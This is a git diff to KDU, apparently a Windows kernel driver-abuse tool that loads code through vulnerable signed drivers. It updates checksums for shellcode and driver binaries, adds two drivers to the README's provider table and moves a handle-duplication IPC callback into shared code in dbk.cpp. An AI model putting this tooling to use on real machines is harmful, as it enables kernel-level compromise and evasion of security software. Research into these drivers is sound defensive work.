diff --git a/KDU.sha256 b/KDU.sha256
index e293055..68ee5bb 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -30,13 +30,13 @@ a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaz
c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h
76ecc2d25f2a06a573ca23a2b2d851cd58424548bac98db487fadb54ff01dd50 *Source\Hamakaze\dsefix.cpp
bde58787437d8243d531f2ab1b33eda6bdf4afffdad08b63f85b16a3b65bd5fd *Source\Hamakaze\dsefix.h
-27f3972b1ee460e8cef1b62af503cbf3e885c4338af56d34e636c2b9e653676b *Source\Hamakaze\global.h
+67605bff584d9fbe3cd34905f5efeb165626cb426668fedbb3e85b587cbdffa2 *Source\Hamakaze\global.h
ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaze\ipcsvc.cpp
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
32566d09a9183a32a3615f987eee2153f9d61b7ea7a95c752a0af0bdd669f1d3 *Source\Hamakaze\KDU.vcxproj
2138d7f641038817debf4484c5b74d42ec4f90955d619d64425f8a42ab2bec77 *Source\Hamakaze\KDU.vcxproj.filters
650f85bfda6b1653e2f0486182ca54ac6bd67517b8a52f886a54dffc8984ef8f *Source\Hamakaze\KDU.vcxproj.user
-c60b8c1d2e6557aa0202ea15cd2d31525b0960f52be6f93956dce651df9b9a1b *Source\Hamakaze\kduplist.h
+d68453cf31b5faa408efd39f971f251d4f3460cefa868c8164bb635e25af4f75 *Source\Hamakaze\kduplist.h
0d45b44d55d3986f8dfca4528c54597cfbc7b120166d9f3d526a22b530ff4480 *Source\Hamakaze\kduprov.cpp
13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
ef4d5f53395fd0350d9cc7a3a150e23da2b2e27e49bb8acde7c9f30dd9910eb1 *Source\Hamakaze\main.cpp
@@ -49,13 +49,12 @@ b99493307cf038c5e4794a46a4c612f32278ba81be738f84945339535dbc91b5 *Source\Hamakaz
a6f3ec0bc0beb0ef152a2a33ca5cbd27bf538316ddf90545b31cd5a78114d6ec *Source\Hamakaze\shellcode.cpp
87c7274c6e821eb447ec87b63b0a058c59f0e64f0c109cfc1d529fb8e2f25150 *Source\Hamakaze\shellcode.h
5428b9eb02810dbc4bfd715ec657ee35a5e61e53079c65f05e1eea4f8a6fa4a0 *Source\Hamakaze\shellmasm.asm
-1bc7b331c4d2be8d2b7686fee741954aa7c44f9b63f2001d451bb9d4ac6c2b61 *Source\Hamakaze\shellstager.lst
879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
-a6160dbf3dd84af0331f665dfd1ec81dac0ce2ba54fe2911d98bd678f6c33377 *Source\Hamakaze\sup.cpp
-58a79fa6ab7e4787e0fc58176d8ec0305552223305945de454992741a6bdde11 *Source\Hamakaze\sup.h
+7a0858c6079814599a1cd01cb7e8b868cbc09f0cd67c52fa28ffbb344314a487 *Source\Hamakaze\sup.cpp
+c9b10b4f9e02bd601c474e7045aabb130c6cbe684d350a1303f42d1d367ac7f5 *Source\Hamakaze\sup.h
d19e67019fc5666a80a153991ec3d2ac3a7e8dbe088dd9ff93d3e0d0ced91cde *Source\Hamakaze\sym.cpp
292efaabf3f6223761aef1fc418ec98108fb529c7260d9d4a72715378c6b7547 *Source\Hamakaze\sym.h
-d8236a9c9c568c5f95acfac1c301ce2b7e3d2ef7b34c95d43c9fc9a0efe8b06c *Source\Hamakaze\tests.cpp
+b3928fe0dac109a549e47d7a9a375293060268f07a1785a8c607205925fb4f5f *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
42c3ee977471fb2966d2abd804d1b69e6aeb6c5c86a02f9c75cf182b42af73c4 *Source\Hamakaze\victim.cpp
5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h
@@ -70,7 +69,7 @@ de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaz
1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h
b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
-498cbec6087b80ff01a3600221b27edd69db7debd6b6194a876a84af2ef5bee1 *Source\Hamakaze\idrv\dbk.cpp
+bfee96a81ea2f722f426f878032b51d8793bf3d747505f8cd5e4ab5b49bccbbc *Source\Hamakaze\idrv\dbk.cpp
24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
8c61e22c624b7fce32fdb1c7fd3075c9d9ac5eb4f0ad3370f575f5af47a4d7c7 *Source\Hamakaze\idrv\dell.cpp
1d864cc688e8a2c38da6b94019f7efba771a0e0b7f68e1c3f8700b8caa76dda0 *Source\Hamakaze\idrv\dell.h
@@ -99,7 +98,7 @@ d281289e0cda5f4171e999bb1313aa235c54583aa8b0df3aa187af35b4ba2057 *Source\Hamakaz
5cb51cbc6d2b2e3174fc2ebbb713e32c34d4d367f299060f400dac331183d236 *Source\Hamakaze\idrv\nal.h
f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaze\idrv\phymem.cpp
399a9ced700381d0e3641f2d97a3e9f5dd59cbe22098ac9c0178454f9060d412 *Source\Hamakaze\idrv\phymem.h
-0f30979d4ffbfa0d6b56fda86bfd8974b34d4acf5b4258be263a84b8d02c4ebe *Source\Hamakaze\idrv\procexp.cpp
+a35639536902ef0c738c7a667119cce18accdef5465059fe45fe5a68cae3ae7a *Source\Hamakaze\idrv\procexp.cpp
8449d829c3285f5a22521fba0db1516c487818f901fd28939fc18fbc3da0eedb *Source\Hamakaze\idrv\procexp.h
bd0c80bc267d1fa0b423a453a22958a8b1ab1ede29291217cc045a9a877a347f *Source\Hamakaze\idrv\rtcore.cpp
08f75ea88874a507c132bafc412c88f9cc9862f78c238dcbd0cc480a04a438f4 *Source\Hamakaze\idrv\rtcore.h
@@ -113,15 +112,15 @@ b3a7fc6cc6a5b33a71a7f043c9a649238de2f7755075a6f5c91c2a544c81f0d8 *Source\Hamakaz
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
285c2c1c44e863142bd5d0606a2bc940fb0e444aa825a675d472860a0499d5e4 *Source\Hamakaze\idrv\zemana.cpp
da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h
-60b580d363f0121caae4c6ec94143c2d4b1b1419c7593af4c412222099e68f5d *Source\Hamakaze\idrv\zodiacon.cpp
-eaf85f2c7194d38b06828bd7ac47f78f5138fe91f904560cd4df26788addb259 *Source\Hamakaze\idrv\zodiacon.h
+103e3c46a148e415a80057caf102c837702983a67d6086482030becf3e429a72 *Source\Hamakaze\idrv\zodiacon.cpp
+72be567129bf43464443801c169ebff5ea6fc276cdd6b0170044ffef974dffe1 *Source\Hamakaze\idrv\zodiacon.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
-89ca03cab3ebb32fa7a560a8f4a69e7d91b9e71f7b47c5b226b88a642e0db026 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
-8bac2488e3c8f8ee589172f959722bf41f6a8d49ea019bdd11c9bbeb2d922302 *Source\Hamakaze\res\Taigei32.bin
+91614e852fd6ba37e8bc26183abe3a767627de222bf97e82f038ce90a1c40f8e *Source\Hamakaze\res\SB_SMBUS_SDK.bin
+d8556d04891d9ae63ed5e82199092b6270b5dc5c47288d27cafd2b51a51bc729 *Source\Hamakaze\res\Taigei32.bin
1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe
-71dcf84933af9d18e8301b3ffb1fae9197df2a352de7142040aef53f3d160390 *Source\Shared\consts.h
+d79f132ea6c7e9557da34c66ab4f33c6acade8382f7e8203e32c783345e22e80 *Source\Shared\consts.h
1cbb3b9ac4c7a6f557ddad181348002d3dfa260be724378487c7efb321162ef8 *Source\Shared\kdubase.h
-e0ba365c8aa8e66fddd0f28bca4b827725911480fdcd968df2792c370f13ef42 *Source\Shared\ldr\ldr.cpp
+2ee707d0b1f83f7bfe85b0f2ed4b3046757db2e44db266fd80373877dd08562d *Source\Shared\ldr\ldr.cpp
37003367e625e218bf7e4c22850ac7d2efe926a6a832d29bc20a9f8b19a479af *Source\Shared\ldr\ldr.h
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\minirtl\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\minirtl\cmdline.h
@@ -152,65 +151,67 @@ d971e037b629849d999303778df77e465ef526a7e90eaea04f5983928a425ebe *Source\Shared\
a68264a684f0c19caf7f2464544d9e8163362cd919f382d08b82cbef0497a6f7 *Source\Shared\tinyaes\aes.h
541e81804b992865dcb3c7f1092b646a5c7d7dde93b83a7be489d4f452aac1bd *Source\Taigei\asio.cpp
0fb3df421a154bff00551def94069f21a91c5f7dcf6695ea1d3af036d0dd2eed *Source\Taigei\asio.h
-dd06a7140e1cd61a888c5b035120175e307be6767d44e15d0b353c4aa2a980ce *Source\Taigei\export.def
+26a3144d60bd6a0d62a3466ba90999cc4a7312b268d56bf8def4cba523364b69 *Source\Taigei\export.def
6c12bf0d697d624a35a8b233a2ee8cfb91db8aa6a6f5cc71142d3d1de98b42b4 *Source\Taigei\global.h
-ab6d1318079253cf388477ea2190837513345dd6a6a731f022e73c80ea806d58 *Source\Taigei\ipc.cpp
+33e18a0ba281cfd3205e3e6af9204e60be4e279b2ca69b5aa1db4f9628131097 *Source\Taigei\ipc.cpp
6711ef2aa6e396743d3a42adf9a901784e4d880fa07ef88873c41bdd4261ac35 *Source\Taigei\ipc.h
-3634d1725df134897618a080e43de72369011a0e118b471b064bf64e3a544ceb *Source\Taigei\main.cpp
-374468ff95a52a32877df397513ad58768a980452498e8e65656db0d6f8302b6 *Source\Taigei\Taigei.vcxproj
-d563bd3017a274175ca6b7e8f93333a3e3ec096d1f3034acfa4e17d8b2420c99 *Source\Taigei\Taigei.vcxproj.filters
+3c9d84318b072505a185e8ca1a23384a8684d02959de53e243d0687214ec99be *Source\Taigei\main.cpp
+b4c64ccefe575eda8a61b3b4cad52fcd8c2b345c7b9baf1c0c2ad9946bfc0168 *Source\Taigei\Taigei.vcxproj
+1e5949735998907c5b53ef495fb6c7942b93e33f5a2a73124fffb46fcf279c35 *Source\Taigei\Taigei.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Taigei\Taigei.vcxproj.user
9e82ce97464b666dad14ffde32e5450a0974d1194ca68cd10e9b2611599dfc28 *Source\Tanikaze\export.def
5bbbcc6c275008ffdd765a3fa53ed3e4ae16ea51bf6ae66c2271f6f065ba0525 *Source\Tanikaze\main.cpp
-7c298189b908570093b38bd4080940a78a9628e6187043ae3b4b7af27316c55d *Source\Tanikaze\resource.h
-dc6c181b2c81aaa12359628ed1f4f1e684953fc1c09445e914883955db676c00 *Source\Tanikaze\resource.rc
-d1d914fbb25404b9d20baf51d247a858dc4af91598e33da2a183271324371444 *Source\Tanikaze\tanikaze.h
-598cccee803774d545c3babe8af5c6615869260274d8ef64c430a0f83fd9f48e *Source\Tanikaze\Tanikaze.vcxproj
-085298d79d85301ba7919f5eb64cf3148868997fb1111835deefc1a8e239fb03 *Source\Tanikaze\Tanikaze.vcxproj.filters
+eced6f6c4a607820b9e023bbb11be8b3511d5a0da6919be67679aeae83e69b0c *Source\Tanikaze\resource.h
+6f1bfe79355e866863977bb2c8bd98b19ba50a5e3aa1d9a81a63a3f5febe19fd *Source\Tanikaze\resource.rc
+b92186ed89413d004353b24ebe0e7abb012e823708463878bb40ca1133946171 *Source\Tanikaze\tanikaze.h
+3c4fe6d30c91cb7eb9b919f8fafc91678d02acf5c45edff5fb30566906be4a24 *Source\Tanikaze\Tanikaze.vcxproj
+51947ebb359027a63a2a0c7a29a14faee9f4e9037982477f964afb10376fa078 *Source\Tanikaze\Tanikaze.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user
-05a74132fb478c1e0de11934358ff24069b9c92d6e1ecfe9289ea42c742efc83 *Source\Tanikaze\data\AsusCertService.bin
-12c5b9df7a5c7f61941d26dd95bcc1d24b17f8f620bccc01d41330cfdcf78f1f *Source\Tanikaze\data\dbutilcat.bin
-23030f4f08597749f71157b99f4f08a64ac53e1a43e28807a53d88e2520ab97e *Source\Tanikaze\data\dbutilinf.bin
-7c0942d1b5140320a8649c1728f1437eccbe0ad30393899e036defce6d6de3b0 *Source\Tanikaze\data\KMUEXE.bin
-50a3b18111e1e06228b09152d2de311ab729889bfb05ce1273e1ad6b3de22b11 *Source\Tanikaze\data\KMUSIG.bin
-a5bfe4928604b22336f0a4339b018e0d39d2c6a6abe4281fb30075f96c7aae3d *Source\Tanikaze\drv\ALSysIO64.bin
-a985d7206aedc4eeeac761d1c3cbfbd98127fb69b04842e858ad35dbdaa740d2 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin
-ea6373ce46e31fcfde3f11676efe499944a2286f6f4f9979e6c363f430578e25 *Source\Tanikaze\drv\amsdk.bin
-5d3da5f5fff4742b98ccd2e046c6238d06fca7254da141989bb3ee550867658e *Source\Tanikaze\drv\asio2.bin
-75f55cef23d2993c93b7ad2b8a58a6f1574d66be1de8f99ce89bf684d0273162 *Source\Tanikaze\drv\AsIO3.bin
-6393910fa9f76925a54e18be1304abbc630b3ce164c21cd1948bb2a20fdc4f6f *Source\Tanikaze\drv\AsrDrv106.bin
-634798c7bca0d32ad8ae859efcc3cfa49212f0c7a1c7b17c7b8ffa52cbf2e587 *Source\Tanikaze\drv\ATSZIO64.bin
-3f11e01732dd3a6e67c6c52d9d08370abf4979708d3ee435ad596a0cc22243ed *Source\Tanikaze\drv\dbk64.bin
-dd748d923bead36e845f4eb63afcf73b94b1123bf5fe047cf5f54f2e80d57ed2 *Source\Tanikaze\drv\DbUtil2_3.bin
-3e4cbc6da15f3757e470ae4ceae7c839d4fcf8b1efba0b66339b8cde9db421c9 *Source\Tanikaze\drv\dbutildrv2.bin
-e17daa59470157dafd05d51989656104bbcd50eb231f9e87e4e525ebe458369e *Source\Tanikaze\drv\DirectIo64.bin
-83f5599a993f90a143d8d276fdcb08b2925d920c34ecadce1c08bb2d8b08ce47 *Source\Tanikaze\drv\DirectIo64_2.bin
-946cc8ea63d8747aa793c048943b63e59a118607e40e0b205ec03f802d4c474c *Source\Tanikaze\drv\ene2.bin
-de91f013d0cd7af376a962ef7baee06ff2971f13cea259f3412cc34c017d0566 *Source\Tanikaze\drv\EneIo64.bin
-5244cd8306615fedd04a9cdd664f3fde1efc823896bbaf116939ef4e58d53bb4 *Source\Tanikaze\drv\EneTechIo64.bin
-01266121cf5fc7464f1f664b5b1397da7f87ce73ea33aaa6f808ed8ed3becbce *Source\Tanikaze\drv\etdsupp.bin
-59beafcdd7057962d9aa9c326adcd902a12cd2584f254852f17f8d7dd76039e1 *Source\Tanikaze\drv\gdrv.bin
-c8328ed776dfb4fe25e66cf8dea9843265cfcee2be012e4343568a7d755ab30f *Source\Tanikaze\drv\GLCKIO2.bin
-0babb4ab84d7a0ae08eb5d5ecb6373fce42ccc5820f886d54b0ba5b29df72998 *Source\Tanikaze\drv\gmerdrv.bin
-0151a6d779712e77e2e750871554a1a60260f6133c2af8519c2fabf3ed284fd1 *Source\Tanikaze\drv\heavenluo.bin
-73dccc203af38a41d78b7649870304a900d6e3b742d1356d8c61dd28b0bdd54d *Source\Tanikaze\drv\HW64.bin
-23faa6841925b9b2f1c1d5a6dfbb0f27a899176412b7cea300eae20488e5a204 *Source\Tanikaze\drv\inpoutx64.bin
-5cfc146db25b21643b5848d3019a09ec80cd479d47461f10b0a0bd5c9b44523b *Source\Tanikaze\drv\iQVM64.bin
-40bfc335e212e5189c72daa5a125241c32cec087feaa407b0802c4f23d13d698 *Source\Tanikaze\drv\KExplore.bin
-3c76fa843624f4d14f28889b0ca782701f446da6f60b17f84d57d5b841b58507 *Source\Tanikaze\drv\kprocesshacker.bin
-6bcf437a4ef1e7f550dffd4b63fb4fa8536e6e9357970ee0cc820183b0ada98e *Source\Tanikaze\drv\LDD.bin
-38efe2d15f562b3e7d71a2c4fbbe6cf2cd989db66ea8cb2024166db62284f5d9 *Source\Tanikaze\drv\lha.bin
-5ec1e3565a783639e51483418c141fc2ee21a9d010f9d7fd6e8952a9977a901b *Source\Tanikaze\drv\mimidrv.bin
-02661b0431aee575e31a1e620cbda148a1517c83eb11f099c0aa1bb1e49f5632 *Source\Tanikaze\drv\MsIo64.bin
-94388c6863689eb2249398c8e1dfd7c82af4e1b38f797f8ed98f7d3af8c3e4c8 *Source\Tanikaze\drv\pcdsrvc_x64.bin
-2ec405e99b825450472517c1dd7df459b151bd366535fa32f32892831ed43588 *Source\Tanikaze\drv\Phymemx64.bin
-de171d43f9a7ab916d0921974d6e81c63c1e1e1d07cea81c976535c913445121 *Source\Tanikaze\drv\physmem.bin
-d46a395cf2223b1ee4abf5d2eaf37f4f736fb8e8beea1e049e8ffed49ed437a8 *Source\Tanikaze\drv\procexp1627.bin
-40ff7320fc1e487d5525f852fb673145714dad3f8b89ed027b1aa10950d82c2d *Source\Tanikaze\drv\procexp1702.bin
-b56ca239054baf6708943c3101096cffa7d9fe96d0dc5aa1ba55cf3c3e97665e *Source\Tanikaze\drv\RTCore64.bin
-cbaaef88409385d1cfbfe4262055ea9d8d5b1ff3378bdf63b3790ef8978e46ce *Source\Tanikaze\drv\rtkio64.bin
-ed1123ada8dc777bc23b3977ccb6a33e451df65e43959f0210beb0ccda2d4a6a *Source\Tanikaze\drv\SysDrv3S.bin
-aa52f47c7793b5aa74c9cf65ad3478637a8c7c0c8d856787c221abe869ab1a57 *Source\Tanikaze\drv\WinRing0x64.bin
+67034ee07c357dc82c9946389d60735f2bc1b3a0e13b4f5c739ba5178a76c27c *Source\Tanikaze\data\AsusCertService.bin
+47136911450d1da1851ff264503e0247bb1c9c1c2457ccb33ac3d458fe159aae *Source\Tanikaze\data\dbutilcat.bin
+3a5f6f40824548130c6c7c7b1969315d01fc58934acb41aa0b5b8664c4b4f66e *Source\Tanikaze\data\dbutilinf.bin
+7e82a859d6c8868db34d624b96cceab9f083beb9492efcddf23f64c47923ba71 *Source\Tanikaze\data\KMUEXE.bin
+a442fb71ed8b762b678656ae1b65b29f72c85e3ec4769082a946f7b72e1406d0 *Source\Tanikaze\data\KMUSIG.bin
+4050c510f1e4a23dc4e6fa2ba3ad24db2ec0ececd1059e99703601f8633c40f7 *Source\Tanikaze\drv\ALSysIO64.bin
+5da885ddffd338f4b4b73ba985a5fc29100d944b927663e9a7c890a176483090 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin
+d135b1a1591dd4ed98cd30e8eb9ece782c0288a7aca3970d9c1ae73658ff4af9 *Source\Tanikaze\drv\amsdk.bin
+6da78e5ba96e7f99947bddec66901f673e6f1b2a097b2faa614135fada5a8f45 *Source\Tanikaze\drv\asio2.bin
+9e1a3369b34f5ea17af2ab6dcfa202143a0a66876e842c7b8933315187bb5bea *Source\Tanikaze\drv\AsIO3.bin
+6bdeaa758f1d0d1190ea44c947295b13cfcdda0c1b246872603f84edf32d1511 *Source\Tanikaze\drv\AsrDrv106.bin
+62da1832d11c607c5fc084be801fdfa2ba018fa25b6aa4347ea947d7a72b932c *Source\Tanikaze\drv\ATSZIO64.bin
+6b71600dec1e692346f072e97a36bfa609f2cdfd19884ec3a77776a13cec335a *Source\Tanikaze\drv\dbk64.bin
+d06a92ed4e46748195a44fc256efd333d50a2cb03274ae5c928eb5d7165cbaf6 *Source\Tanikaze\drv\DbUtil2_3.bin
+9de5ac6cd3b656c788356f25c9d273d90bcd28cc51beb077383d17c4066913be *Source\Tanikaze\drv\dbutildrv2.bin
+b3c03c58b831ec19e36905ae663f2399a8c3a73f8d44dbf0a8bdbf85bf6cb5d9 *Source\Tanikaze\drv\DirectIo64.bin
+c88b12ea45f176b2ea0380adb803fbd7fd6366f740e056f1c337bb7284f21f20 *Source\Tanikaze\drv\DirectIo64_2.bin
+854d85abccb257451c6fecf545851729ccf917dab26ba0111445a166e73481ad *Source\Tanikaze\drv\ene2.bin
+67995474c3d769ebe6ecc45e3e771f95a3b038276e4cf121079e94dfdf7319a4 *Source\Tanikaze\drv\EneIo64.bin
+516da7aedd204918046e19e59de2dcf7368a7a5c652153581d14125f4e16de1e *Source\Tanikaze\drv\EneTechIo64.bin
+2e94a7a81428e14b7a41b406ce2d1a447335f7e197cefbbe1ecefdafd42ab9a5 *Source\Tanikaze\drv\etdsupp.bin
+4535e9f79f940c6e5dfe0cdf64814462fbb8c7bdd0e9374a67e55979281d77df *Source\Tanikaze\drv\gdrv.bin
+d73c2f99841217ff59c00c385a59237ce359ba74e427f180d1a50ec3f9695308 *Source\Tanikaze\drv\GLCKIO2.bin
+d10329323a4ad49d6cb604345c60ef134b84d9f313350646584baf7d9cbf15ba *Source\Tanikaze\drv\gmerdrv.bin
+8462d57c08a2c056c2eb510c233a0480dfb0ce3745614ef2f82ab2c8819e5a36 *Source\Tanikaze\drv\heavenluo.bin
+c0c2f175df1e67457f475a5e544e3e520815cc23a2847eaffbc3260b1503caea *Source\Tanikaze\drv\HW64.bin
+a69febeed32057ea0588b13f8d80a4d1d6c20356bd10575f7db4ee3b447ae6d2 *Source\Tanikaze\drv\inpoutx64.bin
+cf4c4790b582dbc819c9f4ab32e42b67b4606c5d1e31392a70ae31fae0f0d4e6 *Source\Tanikaze\drv\iQVM64.bin
+fabed16b24a313943443ee4738d8ac263745160b9bf361a5e08006b764eded61 *Source\Tanikaze\drv\KExplore.bin
+001b2a9ddf541a945a7c1d6c8d2c23bc928ff06fd1ee4da7edc3df6986c771a0 *Source\Tanikaze\drv\KObjExp.bin
+46b04352250ebb95874ef18ec64fa31ea373ce90635680d299f8edb19cdfe845 *Source\Tanikaze\drv\kprocesshacker.bin
+4cf689502b2e47509f2d8eb4a33a9e271d88e26564a8b18fc3fefee7b7145966 *Source\Tanikaze\drv\KRegExp.bin
+559b56db6f3ba36116d3c6b1b2818775a488d0e8e0ed516753c56473c6102653 *Source\Tanikaze\drv\LDD.bin
+515a4bb03eddb2fb593e3504ec3f12c74639dc15b5fac3359e3bae3922751e4f *Source\Tanikaze\drv\lha.bin
+e604c513e4ba37129c89e971037ea2ef934531d41cc41c70f03159c5ee1474e0 *Source\Tanikaze\drv\mimidrv.bin
+9b63dca03a09f9d0c800e5d148178abc3f19eb949c78a6a61656132926d394aa *Source\Tanikaze\drv\MsIo64.bin
+e3b4040b72239735baf44cedc265ef2c3086d6cf700e36e3dcb6bc6363bf6667 *Source\Tanikaze\drv\pcdsrvc_x64.bin
+eaadbb1c692bc0fc7c49bc05596f764d3edafb0098eb13056d6cb19f4a0f3bff *Source\Tanikaze\drv\Phymemx64.bin
+c3467992e4e57d664a77b5a91b6ba408260350e4ee95604b00ca0abec2050112 *Source\Tanikaze\drv\physmem.bin
+82136994a4ebc411719dcf8b03827c50077a0f72507a52c370b4d36f830d2cd9 *Source\Tanikaze\drv\procexp1627.bin
+3174769519d1ef32c92a1eb3f34efa68c21fe4f083e316c34507dbab22e23576 *Source\Tanikaze\drv\procexp1702.bin
+46e639fb328967b05e5056cfa9da5ca4a8095b8a7628e2185c8f498624b9ac6d *Source\Tanikaze\drv\RTCore64.bin
+dd6498ed873d32ac715c8de6aef5001f8acf454685a7b1c05dac4462bf17892b *Source\Tanikaze\drv\rtkio64.bin
+cd24bdba7ebe4b9c65e54c03e9f1a56fdaf6151b0e5fc4937d6a74a3c7f22fb7 *Source\Tanikaze\drv\SysDrv3S.bin
+83867dc3e4f5d063556eba30e398fa745b8c987c3baa6b4bea073bdba62b3dc1 *Source\Tanikaze\drv\WinRing0x64.bin
bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt
c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln
c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj
diff --git a/README.md b/README.md
index 9057308..33d0d9c 100644
--- a/README.md
+++ b/README.md
@@ -141,6 +141,8 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 34 | MSI | winio | MSI Foundation Service | WINIO | Undefined | |
| 35 | HP | EtdSupport | ETDi Support Driver | Original | 18.0 and below | |
| 36 | Pavel Yosifovich | KExplore | Kernel Explorer | Original | Undefined | |
+| 37 | Pavel Yosifovich | KObjExp | Kernel Object Explorer | Original | Undefined | |
+| 38 | Pavel Yosifovich | KRegExp | Kernel Registry Explorer | Original | Undefined | |
###### *At commit time, data maybe inaccurate.
diff --git a/Source/Hamakaze/global.h b/Source/Hamakaze/global.h
index 0686d80..9af0c81 100644
--- a/Source/Hamakaze/global.h
+++ b/Source/Hamakaze/global.h
@@ -77,6 +77,7 @@ extern "C" {
#include "shared/consts.h"
#include "shared/kdubase.h"
#include "sig.h"
+#include "ipcsvc.h"
#include "sup.h"
#include "sym.h"
#include "compress.h"
@@ -87,7 +88,6 @@ extern "C" {
#include "ps.h"
#include "pagewalk.h"
#include "dsefix.h"
-#include "ipcsvc.h"
#include "diag.h"
#include "tests.h"
diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
index 62ebd6a..497f5e9 100644
--- a/Source/Hamakaze/idrv/dbk.cpp
+++ b/Source/Hamakaze/idrv/dbk.cpp
@@ -4,9 +4,9 @@
*
* TITLE: DBK.CPP
*
-* VERSION: 1.31
+* VERSION: 1.32
*
-* DATE: 09 Apr 2023
+* DATE: 10 Jun 2023
*
* Cheat Engine's DBK driver routines.
*
@@ -21,8 +21,6 @@
#include "idrv/dbk.h"
#include "idrv/ldrsc.h"
-#define DBK_GET_HANDLE 0x1337
-
#define DBK_LDR_DLL L"u.dll"
#define DBK_KMU_EXE L"kernelmoduleunloader.exe"
#define DBK_KMU_SIG L"kernelmoduleunloader.exe.sig"
@@ -67,83 +65,6 @@ NTSTATUS CALLBACK DbkSetupCheatEngineObjectNames(
return ntStatus;
}
-/*
-* DbkpIpcOnException
-*
-* Purpose:
-*
-* ALPC receive exception callback.
-*
-*/
-VOID CALLBACK DbkpIpcOnException(
- _In_ ULONG ExceptionCode,
- _In_opt_ PVOID UserContext
-)
-{
- UNREFERENCED_PARAMETER(UserContext);
-
- supPrintfEvent(kduEventError,
- "[!] Exception 0x%lx thrown during IPC callback\r\n", ExceptionCode);
-}
-
-/*
-* DbkpIpcCallback
-*
-* Purpose:
-*
-* ALPC receive message callback.
-*
-*/
-VOID CALLBACK DbkpIpcCallback(
- _In_ PCLIENT_ID ClientId,
- _In_ PKDU_MSG Message,
- _In_opt_ PVOID UserContext
-)
-{
- KDU_CONTEXT* Context = (PKDU_CONTEXT)UserContext;
-
- if (Context == NULL)
- return;
-
- __try {
-
- if (Message->Function == DBK_GET_HANDLE &&
- Message->Status == STATUS_SECRET_TOO_LONG &&
- Message->ReturnedLength == sizeof(ULONG))
- {
- HANDLE hProcess = NULL, hNewHandle = NULL;
- OBJECT_ATTRIBUTES obja;
-
- InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
-
- if (NT_SUCCESS(NtOpenProcess(&hProcess,
- PROCESS_DUP_HANDLE | PROCESS_TERMINATE,
- &obja,
- ClientId)))
- {
- if (NT_SUCCESS(NtDuplicateObject(
- hProcess,
- (HANDLE)Message->Data,
- NtCurrentProcess(),
- &hNewHandle,
- 0,
- 0,
- DUPLICATE_SAME_ACCESS)))
- {
- Context->DeviceHandle = hNewHandle;
- }
-
- NtTerminateProcess(hProcess, STATUS_TOO_MANY_SECRETS);
- NtClose(hProcess);
- }
-
- }
- }
- __except (EXCEPTION_EXECUTE_HANDLER) {
- return;
- }
-}
-
/*
* DbkOpenCheatEngineDriver
*
@@ -218,8 +139,8 @@ BOOL DbkOpenCheatEngineDriver(
sizeof(g_KduLoaderShellcode),
&memIO))
{
- ipcServer = IpcStartApiServer(DbkpIpcCallback,
- DbkpIpcOnException,
+ ipcServer = IpcStartApiServer(supIpcDuplicateHandleCallback,
+ supIpcOnException,
NULL,
NULL,
(PVOID)Context);
diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp
index ebee86a..a3ab4b1 100644
--- a/Source/Hamakaze/idrv/procexp.cpp
+++ b/Source/Hamakaze/idrv/procexp.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PROCEXP.CPP
*
-* VERSION: 1.30
+* VERSION: 1.32
*
-* DATE: 20 Mar 2023
+* DATE: 10 Jun 2023
*
* Process Explorer driver routines.
*
